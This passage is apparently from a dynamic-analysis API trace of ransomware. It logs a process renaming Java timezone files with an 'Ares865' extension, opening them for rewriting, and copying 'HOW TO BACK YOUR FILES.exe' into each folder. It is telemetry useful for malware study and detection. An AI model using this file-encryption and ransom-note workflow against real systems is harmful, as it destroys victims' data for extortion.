lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52ecc100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52ecc100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.722] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.722] lstrcpyW (in: lpString1=0x2cce47a, lpString2="Beulah" | out: lpString1="Beulah") returned="Beulah" [0135.722] lstrlenW (lpString="Beulah") returned 6 [0135.722] lstrlenW (lpString="Ares865") returned 7 [0135.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.Ares865") returned 75 [0135.723] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah.ares865"), dwFlags=0x1) returned 1 [0135.724] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.724] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276) returned 1 [0135.727] lstrcpyW (in: lpString1=0x2cce47a, lpString2="Center" | out: lpString1="Center") returned="Center" [0135.727] lstrlenW (lpString="Center") returned 6 [0135.727] lstrlenW (lpString="Ares865") returned 7 [0135.728] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.Ares865") returned 75 [0135.728] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center.ares865"), dwFlags=0x1) returned 1 [0135.731] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Center.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\center.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.731] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276) returned 1 [0135.733] lstrcpyW (in: lpString1=0x2cce47a, lpString2="New_Salem" | out: lpString1="New_Salem") returned="New_Salem" [0135.733] lstrlenW (lpString="New_Salem") returned 9 [0135.733] lstrlenW (lpString="Ares865") returned 7 [0135.733] lstrcmpiW (lpString1="w_Salem", lpString2="Ares865") returned 1 [0135.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.Ares865") returned 78 [0135.734] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem.ares865"), dwFlags=0x1) returned 1 [0135.735] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\New_Salem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\new_salem.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.735] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276) returned 1 [0135.738] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" [0135.738] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" [0135.738] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.739] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.740] GetLastError () returned 0x0 [0135.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.740] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52ef2260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52ef2260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.740] lstrcpyW (in: lpString1=0x2cce472, lpString2="Louisville" | out: lpString1="Louisville") returned="Louisville" [0135.740] lstrlenW (lpString="Louisville") returned 10 [0135.740] lstrlenW (lpString="Ares865") returned 7 [0135.740] lstrcmpiW (lpString1="isville", lpString2="Ares865") returned 1 [0135.741] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.Ares865") returned 75 [0135.741] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville.ares865"), dwFlags=0x1) returned 1 [0135.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1500) returned 1 [0135.747] lstrcpyW (in: lpString1=0x2cce472, lpString2="Monticello" | out: lpString1="Monticello") returned="Monticello" [0135.747] lstrlenW (lpString="Monticello") returned 10 [0135.747] lstrlenW (lpString="Ares865") returned 7 [0135.747] lstrcmpiW (lpString1="ticello", lpString2="Ares865") returned 1 [0135.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.Ares865") returned 75 [0135.747] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello.ares865"), dwFlags=0x1) returned 1 [0135.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Monticello.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\monticello.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1260) returned 1 [0135.752] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" [0135.753] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" [0135.753] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.753] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.753] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.754] GetLastError () returned 0x0 [0135.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.754] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745554a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52f3e520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52f3e520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.754] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.755] lstrcpyW (in: lpString1=0x2cce470, lpString2="Indianapolis" | out: lpString1="Indianapolis") returned="Indianapolis" [0135.755] lstrlenW (lpString="Indianapolis") returned 12 [0135.755] lstrlenW (lpString="Ares865") returned 7 [0135.755] lstrcmpiW (lpString1="napolis", lpString2="Ares865") returned 1 [0135.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.Ares865") returned 76 [0135.755] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis.ares865"), dwFlags=0x1) returned 1 [0135.757] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Indianapolis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\indianapolis.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.757] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=868) returned 1 [0135.760] lstrcpyW (in: lpString1=0x2cce470, lpString2="Knox" | out: lpString1="Knox") returned="Knox" [0135.760] lstrlenW (lpString="Knox") returned 4 [0135.760] lstrlenW (lpString="Ares865") returned 7 [0135.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.Ares865") returned 68 [0135.760] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox.ares865"), dwFlags=0x1) returned 1 [0135.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1304) returned 1 [0135.765] lstrcpyW (in: lpString1=0x2cce470, lpString2="Marengo" | out: lpString1="Marengo") returned="Marengo" [0135.765] lstrlenW (lpString="Marengo") returned 7 [0135.765] lstrlenW (lpString="Ares865") returned 7 [0135.765] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.Ares865") returned 71 [0135.765] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo.ares865"), dwFlags=0x1) returned 1 [0135.767] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.767] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=900) returned 1 [0135.770] lstrcpyW (in: lpString1=0x2cce470, lpString2="Petersburg" | out: lpString1="Petersburg") returned="Petersburg" [0135.770] lstrlenW (lpString="Petersburg") returned 10 [0135.770] lstrlenW (lpString="Ares865") returned 7 [0135.770] lstrcmpiW (lpString1="ersburg", lpString2="Ares865") returned 1 [0135.770] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.Ares865") returned 74 [0135.770] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg.ares865"), dwFlags=0x1) returned 1 [0135.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Petersburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\petersburg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.772] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1004) returned 1 [0135.775] lstrcpyW (in: lpString1=0x2cce470, lpString2="Tell_City" | out: lpString1="Tell_City") returned="Tell_City" [0135.775] lstrlenW (lpString="Tell_City") returned 9 [0135.775] lstrlenW (lpString="Ares865") returned 7 [0135.775] lstrcmpiW (lpString1="ll_City", lpString2="Ares865") returned 1 [0135.775] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.Ares865") returned 73 [0135.775] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city.ares865"), dwFlags=0x1) returned 1 [0135.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Tell_City.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\tell_city.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=884) returned 1 [0135.779] lstrcpyW (in: lpString1=0x2cce470, lpString2="Vevay" | out: lpString1="Vevay") returned="Vevay" [0135.779] lstrlenW (lpString="Vevay") returned 5 [0135.779] lstrlenW (lpString="Ares865") returned 7 [0135.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.Ares865") returned 69 [0135.780] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay.ares865"), dwFlags=0x1) returned 1 [0135.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vevay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vevay.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=724) returned 1 [0135.785] lstrcpyW (in: lpString1=0x2cce470, lpString2="Vincennes" | out: lpString1="Vincennes") returned="Vincennes" [0135.785] lstrlenW (lpString="Vincennes") returned 9 [0135.785] lstrlenW (lpString="Ares865") returned 7 [0135.785] lstrcmpiW (lpString1="ncennes", lpString2="Ares865") returned 1 [0135.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.Ares865") returned 73 [0135.785] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes.ares865"), dwFlags=0x1) returned 1 [0135.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=884) returned 1 [0135.790] lstrcpyW (in: lpString1=0x2cce470, lpString2="Winamac" | out: lpString1="Winamac") returned="Winamac" [0135.790] lstrlenW (lpString="Winamac") returned 7 [0135.790] lstrlenW (lpString="Ares865") returned 7 [0135.791] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.Ares865") returned 71 [0135.791] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac.ares865"), dwFlags=0x1) returned 1 [0135.792] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Winamac.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\winamac.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=932) returned 1 [0135.797] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" [0135.798] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" [0135.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.799] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.799] GetLastError () returned 0x0 [0135.799] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.799] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7452f340, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52f64680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52f64680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.799] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.800] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.800] lstrcpyW (in: lpString1=0x2cce474, lpString2="Buenos_Aires" | out: lpString1="Buenos_Aires") returned="Buenos_Aires" [0135.800] lstrlenW (lpString="Buenos_Aires") returned 12 [0135.800] lstrlenW (lpString="Ares865") returned 7 [0135.800] lstrcmpiW (lpString1="s_Aires", lpString2="Ares865") returned 1 [0135.800] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.Ares865") returned 78 [0135.800] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires.ares865"), dwFlags=0x1) returned 1 [0135.801] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 